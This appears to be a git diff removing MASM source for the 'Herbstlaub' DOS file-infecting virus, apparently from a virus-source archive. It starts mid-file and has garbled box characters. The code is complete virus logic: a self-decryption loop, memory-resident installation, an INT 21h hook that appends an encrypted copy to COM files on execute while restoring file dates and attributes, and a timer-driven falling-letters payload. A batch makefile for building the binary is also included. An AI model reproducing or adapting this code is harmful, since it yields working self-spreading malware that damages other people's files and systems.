EQU 4Bh ; - MS_Exec_SF0 EQU 0 ; - Virus_fun EQU 0ffh ; - Virus_Sig EQU 55AA ; -MS_SetPSP EQU 50 ; - PSPsize EQU 00100 ; - PSPCurCom EQU THIS WORD + 016 ; - PSPEnv EQU THIS WORD + 02C ; - PSP_SegJFB EQU THIS WORD + 036 ; - NoEnv EQU 0 ; -MS_GetFileDate EQU 5700 ; -MS_SetFileDate EQU 5701 ; -PSP_100 EQU THIS WORD + PSPsize ; -PSP_102 EQU THIS BYTE + PSPsize + 2 ; - comment # -Ŀ - Ab hier wird Objektcode erzeugt, Datenbereich Nr. 1. - - # ; -Crypt1 DB 0 ; -Crypt2 EQU OFFSET Crypt1 + FIRSTBASE ; -Crypt3 EQU Crypt1 + PSPsize ; - comment # -Ŀ - Einsprungstelle, entschlsseln des Virus falls notwendig. 
- - # ; -XI_000: CLI ; - MOV BP,SP ; - CALL XI_001 ; -XI_001: POP BX ; - SUB BX,FIRSTCONST ; - TEST BYTE PTR CS:[BX+Crypt2],EnCrptd ; - JZ XI_003 ; - LEA SI,[BX + XR_000] ; - MOV SP,OFFSET EOFC-OFFSET XI_003 ; -XI_002: XOR [SI],SI ; - XOR [SI],SP ; - INC SI ; - DEC SP ; - JNZ XI_002 ; -XI_003 LABEL NEAR ; - XR_000 EQU OFFSET XI_003 + FIRSTBASE ; - XR_001 EQU XI_003 + PSPsize ; - MOV SP,BP ; - JMP SHORT XI_004 ; - comment # -Ŀ - Datenbereich 2. - - # ; - XD_000 DW PSPsize ; -Disp_to_com_1 EQU OFFSET XD_000 + FIRSTBASE ; - XD_001 DW 9090 ; -Disp_to_com_2 EQU OFFSET XD_001 + FIRSTBASE ; - XD_002 DW 9090 ; -Initial_AX EQU OFFSET XD_002 + FIRSTBASE ; - XD_003 EQU THIS WORD ; - XD_004 EQU THIS BYTE + 2 ; - NOP ; - NOP ; - NOP ; -Org1stInstr_s1 EQU OFFSET XD_003 + FIRSTBASE ; -Org1stInstr_t1 EQU XD_003 + PSPsize ; -Org1stInstr_t2 EQU XD_003 + PSPsize + 1 ; -Org1stInstr_s2 EQU OFFSET XD_004 + FIRSTBASE ; - XD_005 DW 2 dup ( 9090 ) ; -Org_Int_1C EQU XD_005 + PSPsize ; - XD_006 DW 2 dup ( 9090 ) ; -Org_int_21s EQU OFFSET XD_006 + FIRSTBASE ; -Org_Int_21t EQU XD_006 + PSPsize ; - ; -IF SWITCHABLE ; - ; - XD_007 DW 2 dup ( 9090 ) ; -Org_Int_2F EQU XD_007 + PSPsize ; - XD_008 DB 5, "_HLV_ " ; -Cmd_2F EQU XD_008 + PSPsize ; - XD_009 DB 'HLV is on',0Dh,0Ah,'$' ; -Msg_On EQU XD_009 + PSPsize ; - XD_010 DB 'HLV is off',0Dh,0Ah,'$' ; -Msg_Off EQU XD_010 + PSPsize ; - ; -ENDIF ; - ; - XD_011 DW 9090 ; -File_Attributes EQU XD_011 + PSPsize ; - XD_012 DW 9090 ; -File_Date EQU XD_012 + PSPsize ; - XD_013 DW 9090 ; -File_Time EQU XD_013 + PSPsize ; - XD_014 DW 2 dup ( 9090 ) ; -Pathname EQU XD_014 + PSPsize ; - XD_015 DW 2 dup ( 9090 ) ; -File_Size_lsb EQU XD_015 + PSPsize ; -File_Size_msb EQU XD_015 + PSPsize + 2 ; - XD_016 DB NearJmp ; -FirstOpCode_1 EQU XD_016 + PSPsize ; - XD_017 DW 9090 ; -FirstOpCode_2 EQU XD_017 + PSPsize ; - XD_018 DB 90 ; -Num_of_Col EQU XD_018 + PSPsize ; - XD_019 DB 90 ; -Last_Line EQU XD_019 + PSPsize ; - XD_020 DB 90 ; -Prevent_Snow? 
EQU XD_020 + PSPsize ; -Last_Pair EQU THIS WORD + PSPsize ; - XD_021 DB 90 ; - XD_022 DB 90 ; -Last_Char EQU XD_021 + PSPsize ; -Last_Attr EQU XD_022 + PSPsize ; -RecTyp1 RECORD ExtCom:1, Recf_1:1, R_in_1c:1 ; - XD_023 RecTyp1 <0,0,0> ; -ISR_Flags EQU XD_023 + PSPsize ; - XD_024 DW 9090 ; -Seg_of_VRAM EQU XD_024 + PSPsize ; - XD_025 DW 9090 ; -Page_offset EQU XD_025 + PSPsize ; - XD_026 DW 9090 ; -Speed EQU XD_026 + PSPsize ; - XD_027 DW 9090 ; -XR_002 EQU XD_027 + PSPsize ; - XD_028 DW 9090 ; -XR_003 EQU XD_028 + PSPsize ; - XD_029 DW 9090 ; -Num_of_char EQU XD_029 + PSPsize ; - XD_030 DW 9090 ; -XR_004 EQU XD_030 + PSPsize ; - XD_031 DW 7 dup ( 9090 ) ; -FirstRandom EQU XD_031 + PSPsize ; -LastRandom EQU This Word + PSPsize ; - DW 9090 ; - comment # -Ŀ - Installieren u. relozieren falls notwendig. - - # ; -XI_004: CALL XI_005 ; -XI_005 LABEL NEAR ; -XR_005 EQU XI_005 + PSPsize ; - POP BX ; - SUB BX,FIRSTBASE2 ; - MOV CS:[BX+Disp_to_com_2],CS ; - MOV CS:[BX+Initial_AX],AX ; - MOV AX,CS:[BX+Org1stInstr_s1] ; - MOV [PSP_100],AX ; - MOV AL,CS:[BX+Org1stInstr_s2] ; - MOV [PSP_102],AL ; - PUSH BX ; - MOV AH,MS_GetVer ; - MSDOS ; - POP BX ; - CMP AL,DOS_v_02 ; - JB XI_006 ; - MOV AX,MS_Exec * 100 + Virus_fun ; - XOR DI,DI ; - XOR SI,SI ; - MSDOS ; - CMP DI,Virus_sig ; - JNZ XI_007 ; -XI_006: STI ; - MOV_S ES,DS ; - MOV AX,CS:[BX+Initial_AX] ; - JMP DWORD PTR CS:[BX+Disp_to_com_1] ; -XI_007: PUSH BX ; - MOV AX,MS_GetInt * 100 + DOS ; - MSDOS ; - MOV AX,BX ; - POP BX ; - MOV CS:[BX+Org_int_21s],AX ; - MOV CS:[BX+Org_int_21s + 2],ES ;------------; - MOV AX, (OFFSET EOFC - OFFSET Crypt1) SHR 4 + 11 ; - MOV BP,CS ;------------; - DEC BP ; - MOV ES,BP ; - MOV SI,CS:[PSPCurCom] ; - MOV ES:[MemCBowned],SI ; - MOV DX,ES:[MemCBsize] ; - MOV ES:[MemCBsize],AX ; - MOV ES:[MemCBsig],'M' ; - SUB DX,AX ; - DEC DX ; - INC BP ; - ADD BP,AX ; - INC BP ; - MOV ES,BP ; - PUSH BX ; - MOV AH,MS_SetPSP ; - MOV BX,BP ; - MSDOS ; - POP BX ; - XOR DI,DI ; - MOV_S SS,ES ; - PUSH DI ; - LEA 
DI,[BX+XR_010] ; - MOV SI,DI ; - MOV CX,OFFSET EOFC ; - STD ; - REPZ MOVSB ; - PUSH ES ; - LEA CX,[BX+XR_006] ; - PUSH CX ; - RETF ; -XI_008 LABEL NEAR ; -XR_006 EQU OFFSET XI_008 + FIRSTBASE ; - MOV CS:[BX+Disp_to_com_2],CS ; - LEA CX,[BX+Crypt2] ; - REPZ MOVSB ; - MOV CS:[PSP_SegJFB],CS ; - DEC BP ; - MOV ES,BP ; - MOV ES:[MemCBsize],DX ; - MOV ES:[MemCBsig],'Z' ; - MOV ES:[MemCBowned],CS ; - INC BP ; - MOV ES,BP ; - MOV_S ES,DS ; - MOV_S DS,CS ; - LEA SI,[BX+Crypt2] ; - MOV DI,PSPsize ; - MOV CX,OFFSET EOFC ; - CLD ; - REPZ MOVSB ; - PUSH ES ; - LEA AX,[XR_007] ; - PUSH AX ; - RETF ; -XI_009 LABEL NEAR ; -XR_007 EQU XI_009 + PSPsize ; - MOV CS:[PSPEnv],NoEnv ; - MOV CS:[PSPCurCom],CS ; - PUSH DS ; - LEA DX,[XR_008] ; - MOV_S DS,CS ; - MOV AX,MS_SetInt * 100 + DOS ; - MSDOS ; - POP DS ; - MOV AH,MS_SetDTA ; - MOV DX,DTA_in_PSP ; - MSDOS ; - SAVE DS,ES,SI,DI,CX ; - MOV_S ES,CS ; - MOV CX,BIOSDATASEG ; - MOV DS,CX ; - MOV DI,OFFSET FirstRandom ; - MOV SI,OFFSET B_TIMERVAR ; - MOV CL,8 ; - CLD ; - REPZ MOVSW ; - REST CX,DI,SI,ES,DS ; - ; -IF SWITCHABLE ; - ; - PUSH DS ; - MOV AX,MS_GetInt * 100 + DOS_multi ; - MSDOS ; - MOV CS:[Org_Int_2F],BX ; - MOV CS:[Org_Int_2F + 2],ES ; - MOV AX,MS_SetInt * 100 + DOS_multi ; - MOV DX,offset Int_2F_ISR ; - MOV_S DS,CS ; - MSDOS ; - POP DS ; - ; -ENDIF ; - ; - OR CS:[ISR_Flags],MASK ExtCom ; - MOV AH,MS_GetDateTime ; - MSDOS ; - CMP CX,YEAR ; - JZ XI_010 ; - JMP SHORT XI_011 ; -XI_010: CMP DH,MONTH ; - JB XI_011 ; - AND CS:[ISR_Flags],NOT MASK ExtCom ; -XI_011: MOV AX,1518 ; - CALL Random ; - INC AX ; - MOV CS:[XR_002],AX ; - MOV CS:[XR_003],AX ; - MOV CS:[XR_004],1 ; - MOV AX,MS_GetInt * 100 + TimerInt ; - MSDOS ; - MOV CS:[Org_Int_1C],BX ; - MOV CS:[Org_Int_1C + 2],ES ; - PUSH DS ; - MOV AX,MS_SetInt * 100 + TimerInt ; - MOV DX,OFFSET XR_009 ; - MOV_S DS,CS ; - MSDOS ; - POP DS ; -XI_012: MOV BX,OFFSET XR_005 - (FIRSTBASE2) ; - JMP XI_006 ; - comment # -Ŀ - Neue Interrupt 21(h) Behandlungsroutine ( verndert Exec - Funktion ). 
- - # ; -XI_013 LABEL NEAR ; -XR_008 EQU XI_013 + PSPsize ; - CMP AH,MS_Exec ; - JZ XI_016 ; -XI_014: JMP DWORD PTR CS:[Org_Int_21t] ; -XI_015: MOV DI,Virus_Sig ; - LES AX,CS:DWORD PTR [Org_Int_21t] ; - MOV DX,CS ; - IRET ; -XI_016: CMP AL,Virus_fun ; - JZ XI_015 ; - CMP AL,MS_Exec_SF0 ; - JNZ XI_014 ; - SAVE F,AX,BX,CX,DX,SI,DI,BP,ES,DS ; - MOV CS:[Pathname],DX ; - MOV CS:[Pathname + 2],DS ; - MOV_S ES,CS ; - MOV AX,MS_Open * 100 + Read_Only ; - MSDOS ; - JB XI_018 ; - MOV BX,AX ; - MOV AX,MS_GetFileDate ; - MSDOS ; - MOV CS:[File_Date],DX ; - MOV CS:[File_Time],CX ; - MOV AH,MS_Read ; - MOV_S DS,CS ; - MOV DX,OFFSET Org1stInstr_t1 ; - MOV CX,3 ; - MSDOS ; - JB XI_018 ; - CMP AX,CX ; - JNZ XI_018 ; - MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - MOV CS:[File_Size_lsb],AX ; - MOV CS:[File_Size_msb],DX ; - MOV AH,MS_Close ; - MSDOS ;---------------; - CMP CS:[Org1stInstr_t1], 'Z' * 100 + 'M' ; - JNZ XI_017 ; - JMP XI_025 ; -XI_017: CMP CS:[File_Size_msb],+0 ; - JA XI_018 ; - CMP CS:[File_Size_lsb],offset Crypt1-offset EOFC-20 ; - JBE XI_019 ; -XI_018: JMP XI_025 ; -XI_019: CMP BYTE PTR CS:[Org1stInstr_t1],NearJmp ; - JNZ XI_020 ; - MOV AX,CS:[File_Size_lsb] ; - ADD AX,OFFSET Crypt1 - offset EOFC - 2 ; - CMP AX,CS:[Org1stInstr_t2] ;---------------; - JZ XI_018 ; - ; -IF DEMO ; -XI_020: CALL DEMO_Infect ; - JMP XI_025 ; - ; -IF2 ;----------------; -%Out ͻ -%Out Demo - Version, -%Out k e i n Virus. 
-ENDIF ;----------------; -ELSE ; -IFDEF _DANGER ; -XI_020 MOV AX,MS_GetFileAttr ; - LDS DX,CS:DWORD PTR [Pathname] ; - MSDOS ; - JB XI_018 ; - MOV CS:[File_Attributes],CX ; - XOR CL,Attr_A ; - TEST CL,Attr_ASHR ; - JZ XI_021 ; - MOV AX,MS_SetFileAttr ; - XOR CX,CX ; - MSDOS ; - JB XI_018 ; -XI_021: MOV AX,MS_Open * 100 + Read_Write ; - MSDOS ; - JB XI_018 ; - MOV BX,AX ; - MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - CALL Append_Virus ; - JNB XI_022 ; - MOV AX,MS_MoveFP * 100 + OfsFrmTop ; - MOV CX,CS:[File_Size_msb] ; - MOV DX,CS:[File_Size_lsb] ; - MSDOS ; - MOV AH,MS_Write ; - XOR CX,CX ; - MSDOS ; - JMP SHORT XI_023 ; -XI_022: MOV AX,MS_MoveFP * 100 + OfsFrmTop ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - JB XI_023 ; - MOV AX,CS:[File_Size_lsb] ; - ADD AX,-2 ; - MOV CS:[FirstOpCode_2],AX ; - MOV AH,MS_Write ; - MOV DX,OFFSET FirstOpCode_1 ; - MOV CX,3 ; - MSDOS ; -XI_023: MOV AX,MS_SetFileDate ; - MOV DX,CS:[File_Date] ; - MOV CX,CS:[File_Time] ; - MSDOS ; - MOV AH,MS_Close ; - MSDOS ; - MOV CX,CS:[File_Attributes] ; - TEST CL,Attr_SHR ; - JNZ XI_024 ; - TEST CL,Attr_A ; - JNZ XI_025 ; -XI_024: MOV AX,MS_SetFileAttr ; - LDS DX,CS:DWORD PTR [Pathname] ; - MSDOS ; -IF2 ;----------------; -%Out ͻ -%Out KEIN DEMO, -%Out scharfer Virus. -ENDIF ; -ELSE ; - .ERR ; -ENDIF ; -ENDIF ; -IF SWITCHABLE ; -IF2 ; -%Out ͻ -%Out Neuer interner MSDOS Befehl '_HLV_' ! -ENDIF ; -ELSE ; -IF2 ; -%Out ͻ -%Out Kommando '_HLV_' nicht implementiert. -ENDIF ; -ENDIF ; -DISPNUM MACRO nu,nuxx ; -%Out (Monat - Jahr) nu - nuxx -ENDM ; -IF2 ; -%Out Bis zum Jahresende aktiv ab: -.radix 10 ; -DISPNUM %MONTH,%YEAR ; -.radix 16 ; -%Out ͼ -endif ; -XI_025: REST DS,ES,BP,DI,SI,DX,CX,BX,AX,F ;----------------; - JMP XI_014 ; -IF DEMO ; - ; - comment # -Ŀ - Statt APPEND in der DEMO - Version aufgerufene Prozedur. 
- - # ; -DEMO_INFECT PROC NEAR ; - push ax ; - push cx ; - in al,61 ; - or al,3 ; - out 61,al ; - mov al,0b6 ; - out 43,al ; - mov cx,0a ; -XI_026: dec cx ; - jz XI_030 ; -XI_027: mov ax,200d ; -XI_028: dec ax ; - cmp ax,100d ; - jz XI_031 ; - push ax ; - out 42,al ; - push cx ; - mov cx,150d ; -XI_029: nop ; - loop XI_029 ; - pop cx ; - mov al,ah ; - out 42,al ; - pop ax ; - jmp XI_028 ; -XI_030: in al,61 ; - and al,0fc ; - out 61,al ; - pop cx ; - pop ax ; - ret ; -XI_031: inc ax ; - cmp ax,600d ; - jz XI_026 ; - push ax ; - out 42,al ; - push cx ; - mov cx,150d ; -XI_032: nop ; - loop XI_032 ; - pop cx ; - mov al,ah ; - out 42,al ; - pop ax ; - jmp XI_031 ; -DEMO_INFECT ENDP ; - ; -ELSE ; - comment # -Ŀ - Append Virus - von der Int21ISR aufgerufene Infektions-Prozdur - - # ; -Append_Virus PROC NEAR ; - SAVE ES,BX ; - MOV AH,MS_AllocMem ;----------; - MOV BX,(OFFSET EOFC - OFFSET Crypt1) SHR 4 + 1 ; - MSDOS ;----------; - POP BX ; - JNB XI_034 ; -XI_033: STC ; - POP ES ; - RET ; -XI_034: MOV CS:[Crypt3],EnCrptd ; - MOV ES,AX ; - MOV_S DS,CS ; - XOR DI,DI ; - MOV SI,PSPsize ; - MOV CX,OFFSET EOFC ; - CLD ; - REPZ MOVSB ; - MOV DI,OFFSET XI_003 ; - MOV SI,OFFSET XR_001 ; - ADD SI,[File_Size_lsb] ; - MOV CX,OFFSET EOFC - OFFSET XI_003 ; -XI_035: XOR ES:[DI],SI ; - XOR ES:[DI],CX ; - INC DI ; - INC SI ; - LOOP XI_035 ; - MOV DS,AX ; - MOV AH,MS_Write ; - XOR DX,DX ; - MOV CX,OFFSET EOFC ; - MSDOS ; - SAVE F,AX ; - MOV AH,MS_ReleaseMem ; - MSDOS ; - REST AX,F ; - MOV_S DS,CS ; - JB XI_033 ; - CMP AX,CX ; - JNZ XI_033 ; - POP ES ; - CLC ; - RET ; -Append_Virus ENDP ; - ; -ENDIF ; - comment # -Ŀ - 'Zufallszahlen' - Generator. 
- - # ; -Random PROC NEAR ; - SAVE DS ; - MOV_S DS,CS ; - SAVE BX,CX,DX,AX ; - MOV CX,7 ; - MOV BX,offset LastRandom ; - PUSH [BX] ; -XI_036: MOV AX,[BX-02] ; - ADC [BX],AX ; - DEC BX ; - DEC BX ; - LOOP XI_036 ; - POP AX ; - ADC [BX],AX ; - MOV DX,[BX] ; - POP AX ; - OR AX,AX ; - JZ XI_037 ; - MUL DX ; -XI_037: MOV AX,DX ; - REST DX,CX,BX,DS ; - RET ; -Random ENDP ; - comment # -Ŀ - Zeichen und Attribut aus Videospeicher auslesen. - - # ; -Load_from_VRAM PROC NEAR ; - SAVE SI,DS,DX ; - MOV AL,DH ; - MUL [Num_of_Col] ; - MOV DH,0 ; - ADD AX,DX ; - SHL AX,1 ; - ADD AX,[Page_offset] ; - MOV SI,AX ; - TEST [Prevent_Snow?],-1 ; - MOV DS,[Seg_of_VRAM] ; - JZ XI_038 ; - Wait_HRI_or_VRI ; -XI_038: LODSW ; - STI ; - REST DX,DS,SI ; - RET ; -Load_from_VRAM ENDP ; - comment # -Ŀ - Zeichen und Attribut (AX) in den Videospeicher schreiben. - - # ; -Write_to_VRAM PROC NEAR ; - SAVE DI,ES,DX,BX ; - MOV BX,AX ; - MOV AL,DH ; - MUL [Num_of_Col] ; - MOV DH,0 ; - ADD AX,DX ; - SHL AX,1 ; - ADD AX,[Page_offset] ; - MOV DI,AX ; - TEST [Prevent_Snow?],-1 ; - MOV ES,[Seg_of_VRAM] ; - JZ XI_039 ; - Wait_HRI_or_VRI ; -XI_039: MOV AX,BX ; - STOSB ; - STI ; - REST BX,DX,ES,DI ; - RET ; -Write_to_VRAM ENDP ; - comment # -Ŀ - Bit 0 von Port B des 8255 Chips zurcksetzen (IO-Adresse : &H61 ). - - # ; -Toggle_Speaker PROC NEAR ; - PUSH AX ; - IN AL,PORT_B_8255 ; - XOR AL,02 ; - AND AL,0FE ; - OUT PORT_B_8255,AL ; - POP AX ; - RET ; -Toggle_Speaker ENDP ; - comment # -Ŀ - CF gesetzt, wenn AL ein nicht darstellbares Zeichen enthlt. - - # ; -Is_it_blank_? PROC NEAR ; - CMP AL,0 ; - JZ XI_040 ; - CMP AL,20 ; - JZ XI_040 ; - CMP AL,-1 ; - JZ XI_040 ; - CLC ; - RET ; -XI_040: STC ; - RET ; -Is_it_blank_? ENDP ; - comment # -Ŀ - CF gesetzt, wenn AL ein Zeichen aus dem Linienzeichensatz enthlt. - - # ; -Spec_Graphik? PROC NEAR ; - CMP AL,0B0 ; - JB XI_041 ; - CMP AL,0DF ; - JA XI_041 ; - STC ; - RET ; -XI_041: CLC ; - RET ; -Spec_Graphik? 
ENDP ; - comment # -Ŀ - Geschwindigkeit der Maschine ( zur Verwendung in DELAY ) ermitteln. - - # ; -GetSysSpeed PROC NEAR ; - PUSH DS ; - MOV AX,BIOSDATASEG ; - MOV DS,AX ; - STI ; - MOV AX,[B_TIMERVAR] ; -XI_042: CMP AX,[B_TIMERVAR] ; - JZ XI_042 ; - XOR CX,CX ; - MOV AX,[B_TIMERVAR] ; -XI_043: INC CX ; - JZ XI_045 ; - CMP AX,[B_TIMERVAR] ; - JZ XI_043 ; -XI_044: POP DS ; - MOV AX,CX ; - XOR DX,DX ; - MOV CX,0F ; - DIV CX ; - MOV CS:[Speed],AX ; - RET ; -XI_045: DEC CX ; - JMP XI_044 ; -GetSysSpeed ENDP ; - comment # -Ŀ - Verzgern ( Verzgerungszeit ist kaum maschinenabhngig ). - - # ; -Delay PROC NEAR ; - PUSH CX ; -XI_046: PUSH CX ; - MOV CX,[Speed] ; -XI_047: LOOP XI_047 ; - POP CX ; - LOOP XI_046 ; - POP CX ; - RET ; -Delay ENDP ; - comment # -Ŀ - Eine neue Interrupt 1C(h) Behandlungsroutine. - - # ; -XI_048 LABEL NEAR ; -XR_009 EQU XI_048 + PSPsize ;----------; - TEST CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom ; - JZ XI_049 ;----------; - JMP XI_067 ; -XI_049: OR CS:[ISR_Flags],MASK R_in_1c ; - DEC CS:[XR_002] ; - JZ XI_050 ; - JMP XI_066 ; -XI_050: SAVE DS,ES ; - MOV_S DS,CS ; - MOV_S ES,CS ; - SAVE AX,BX,CX,DX,SI,DI,BP ; - MOV AL,EOI_8259A ; - OUT PORT_B_8259A,AL ; - MOV AX,[XR_003] ; - CMP AX,0438 ; - JNB XI_051 ; - MOV AX,0438 ; -XI_051: CALL Random ; - INC AX ; - MOV [XR_002],AX ; - MOV [XR_003],AX ; - PUSH DS ; - MOV AX,BIOSDATASEG ; - MOV DS,AX ; - MOV AX,[B_VidPage] ; - POP DS ; - MOV [Page_offset],AX ; - MOV [Last_Line],18 ; - MOV DL,-1 ; - MOV AX,1130 ; - MOV BH,0 ; - SAVE ES,BP ; - INT 10 ; - REST BP,ES ; - CMP DL,-1 ; - JZ XI_052 ; - MOV [Last_Line],DL ; -XI_052: CALL GetSysSpeed ; - MOV AH,0F ; - INT 10 ; - MOV [Num_of_Col],AH ; - MOV [Prevent_Snow?],0 ; - MOV [Seg_of_VRAM],MonoBase ; - CMP AL,07 ; - JZ XI_054 ; - JB XI_053 ; - JMP XI_064 ; -XI_053: MOV [Seg_of_VRAM],ColorBase ; - CMP AL,03 ; - JA XI_054 ; - CMP AL,02 ; - JB XI_054 ; - MOV [Prevent_Snow?],01 ; - MOV AL,[Last_Line] ; - INC AL ; - MUL [Num_of_Col] ; - MOV [Num_of_char],AX ; - MOV 
AX,[XR_004] ; - CMP AX,[Num_of_char] ; - JBE XI_054 ; - MOV AX,[Num_of_char] ; -XI_054: CALL Random ; - INC AX ; - MOV SI,AX ; -XI_055: XOR DI,DI ; -XI_056: INC DI ; - MOV AX,[Num_of_char] ; - SHL AX,1 ; - CMP DI,AX ; - JBE XI_057 ; - JMP XI_064 ; -XI_057: OR [ISR_Flags],MASK Recf_1 ; - MOV AL,[Num_of_Col] ; - MOV AH,0 ; - CALL Random ; - MOV DL,AL ; - MOV AL,[Last_Line] ; - MOV AH,0 ; - CALL Random ; - MOV DH,AL ; - CALL Load_from_VRAM ; - CALL Is_it_blank_? ; - JB XI_056 ; - CALL Spec_Graphik? ; - JB XI_056 ; - MOV [Last_Pair],AX ; - MOV CL,[Last_Line] ; - MOV CH,0 ; -XI_058: INC DH ; - CMP DH,[Last_Line] ; - JA XI_062 ; - CALL Load_from_VRAM ; - CMP AH,[Last_Attr] ; - JNZ XI_062 ; - CALL Is_it_blank_? ; - JB XI_060 ; -XI_059: CALL Spec_Graphik? ; - JB XI_062 ; - INC DH ; - CMP DH,[Last_Line] ; - JA XI_062 ; - CALL Load_from_VRAM ; - CMP AH,[Last_Attr] ; - JNZ XI_062 ; - CALL Is_it_blank_? ; - JNB XI_059 ; - CALL Toggle_Speaker ; - DEC DH ; - CALL Load_from_VRAM ; - MOV [Last_Char],AL ; - INC DH ; -XI_060: AND [ISR_Flags],NOT MASK Recf_1 ; - DEC DH ; - MOV AL,' ' ; - CALL Write_to_VRAM ; - INC DH ; - MOV AL,[Last_Char] ; - CALL Write_to_VRAM ; - JCXZ XI_061 ; - CALL Delay ; - DEC CX ; -XI_061: JMP XI_058 ; -XI_062: TEST [ISR_Flags],MASK Recf_1 ; - JZ XI_063 ; - JMP XI_056 ; -XI_063: CALL Toggle_Speaker ; - DEC SI ; - JZ XI_064 ; - JMP XI_055 ; -XI_064: IN AL,PORT_B_8255 ; - AND AL,0FC ; - OUT PORT_B_8255,AL ; - MOV AX,3 ; - CALL Random ; - INC AX ; - MUL [XR_004] ; - JNB XI_065 ; - MOV AX,-1 ; -XI_065: MOV [XR_004],AX ; - REST BP,DI,SI,DX,CX,BX,AX,ES,DS ; -XI_066: AND CS:[ISR_Flags],NOT MASK R_in_1c ; -XI_067: JMP DWORD PTR CS:[Org_Int_1C] ; - ; -IF SWITCHABLE ; - ; - comment # -Ŀ - Implementierung eines neuen in CMD_2F definierten internen Befehls. 
- - # ; -XI_068 Label Near ; -Int_2F_ISR EQU XI_068 + PSPsize ; - CMP AH,0AEH ; - JNZ Int_2F_end ; - CMP DX,-1 ; - JNZ Int_2F_end ; - CMP AL,0 ; - JNZ Int_2F_2nd ; - CALL Decode_2F ; - JNZ Int_2F_end ; - DEC AL ; - IRET ; -Int_2F_2nd: CMP AL,1 ; - JNZ Int_2F_end ; - CALL Decode_2F ; - JNZ Int_2F_end ; - SAVE DS,DX,AX ; - MOV_S DS,CS ; - XOR [ISR_Flags],MASK ExtCom ; - MOV DX,OFFSET MSG_ON ; - TEST [ISR_Flags],MASK ExtCom ; - JZ XI_069 ; - MOV DX,OFFSET MSG_OFF ; -XI_069: MOV AH,9 ; - MSDOS ; - REST AX,DX,DS ; - AND BYTE PTR [SI],0 ; - IRET ; -Int_2F_end: JMP DWORD PTR CS:[Org_Int_2F] ; - comment # -Ŀ - berprfen, ob der in CMD_2F definierte Befehl angesprochen wurde. - - # ; -Decode_2F PROC NEAR ; - SAVE SI,DI,ES,CX ; - MOV CX,05 ; - MOV_S ES,CS ; - MOV DI,OFFSET Cmd_2F ; - CLD ; - REPE CMPSW ; - REST CX,ES,DI,SI ; - RET ; -Decode_2F ENDP ; - ; -ENDIF ; - comment # -Ŀ - Okay, das war's. Zum Schlu noch einige Definitionen. - - # ; -EOFC EQU THIS WORD ; -XR_010 EQU OFFSET EOFC - 1 + FIRSTBASE ; -TEXT ENDS ; -IF2 ;----------------; -%Out -%Out (C) 1990 164A12565AA18213165556D3125C4B962712 ͼ -ENDIF ; -comment # -ͻ - - So knnte ein Batch - Makefile aussehen : - - @cls - @if %1.==. goto nopar - @if not exist %1.asm goto noasm - @ctty nul - @del %1.obj - @del %1.lst - @del %1.crf - @del %1.ref - @del %1.map - @del %1.exe - @del %1.bin - @del _HLV_.COM - @ctty con - @masm /b63 %1,,%1,%1 %2 %3 %4; - @if not exist %1.obj goto masm_err - @link %1,,%1; - @if not exist %1.exe goto link_err - @exe2bin %1; - @if not exist %1.bin goto exe2_err - @cref %1; - @if not exist %1.ref goto cref_err - @echo >> %1.lst - @copy %1.lst+%1.map+%1.ref %1.t > nul - @del %1.lst > nul - @ren %1.t %1.lst > nul - @del %1.obj > nul - @del %1.crf > nul - @del %1.ref > nul - @del %1.map > nul - @del %1.exe > nul - @echo n %1.bin > md.inp - @echo l 11f >> md.inp - @echo a 110 >> md.inp - @echo add cx,20 >> md.inp - @echo. 
>> md.inp - @echo g =110 113 >> md.inp - @echo f 110 11e 20 >> md.inp - @echo e 110 '%1' >> md.inp - @echo f 100 10f 90 >> md.inp - @echo a 100 >> md.inp - @echo jmp 120 >> md.inp - @echo nop >> md.inp - @echo nop >> md.inp - @echo nop >> md.inp - @echo mov ax,4c00 >> md.inp - @echo int 21 >> md.inp - @echo. >> md.inp - @echo n _HLV_.com >> md.inp - @echo w >> md.inp - @echo q >> md.inp - @debug < md.inp > nul - @cls - @echo. - @echo ͻ - @echo - @echo MAKEHLV erfolgreich beendet, _HLV_.com wurde erstellt. - @echo - @echo ͼ - @echo. - @goto ende - :nopar - @echo FEHLER ! Mindestens ein Parameter ist erforderlich ! - @echo Syntax : MAKEHLV asmfile [switches] - @goto ende - :noasm - @echo FEHLER ! Die Datei %1.ASM ist nicht zu finden ! - @goto ende - :masm_err - @echo FEHLER ! %1.OBJ konnte nicht erstellt werden ! - @goto ende - :link_err - @echo FEHLER ! %1.EXE konnte nicht erstellt werden ! - @goto ende - :exe2_err - @echo FEHLER ! %1.BIN konnte nicht erstellt werden ! - @goto ende - :cref_err - @echo FEHLER ! %1.REF konnte nicht erstellt werden ! - :ende - -ͼ -# -END - -; -; > and Remember Don't Forget to Call < -; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < -; diff --git a/c/CASCSPEC (34).ASM b/c/CASCSPEC (34).ASM deleted file mode 100755 index 4ccbc83..0000000 --- a/c/CASCSPEC (34).ASM +++ /dev/null 
@@ -1,1183 +0,0 @@ -PAGE 62,132 -TITLE _HLV_ (- Microsoft MASM 5.1 source -) -SUBTTL (C) 1990 164A12565AA18213165556D3125C4B962712 -.RADIX 16 -.LALL - -TRUE EQU 1 -FALSE EQU 0 - -MONTH EQU 9D -YEAR EQU 1991D - -DEMO EQU TRUE - -SWITCHABLE = TRUE -IFDEF _NOSWITCH -SWITCHABLE = FALSE -ENDIF - -comment # -ͻ - - ===================== - H E R B S T L A U B - ===================== - - - SPRACHE: MASM 4.00 (+) [ frhere Versionen brechen z.B. mit - *OUT OF MEMORY* (3.00) ab oder lassen - sogar den PC abstrzen (1.10) ] - - ( Eine als Beispiel gedachte Batchdatei zur Steuerung der bersetzung - ist am Ende dieses Quelltextes als Kommentar hinzugefgt. ) - -ͼ -Ŀ - Whrend der bersetzung zu auszugebende Meldungen, 1. Teil. - -# -IF1 -REPT 50 -%Out -ENDM; -%Out ͻ -%Out -%Out Ŀ -%Out Ĵ H E R B S T L A U B İ -%Out ٰ -%Out -ENDIF -comment # -Ŀ - Einige Assembler - Makros. - -# ; -MSDOS MACRO ; - INT 21 ; - ENDM ; -Wait_HRI_or_VRI MACRO ; - LOCAL _X_1, _X_2, _X_3 ; - MOV DX,03DA ; - CLI ; - _X_1: IN AL,DX ; - TEST AL,08 ; - JNZ _X_3 ; - TEST AL,01 ; 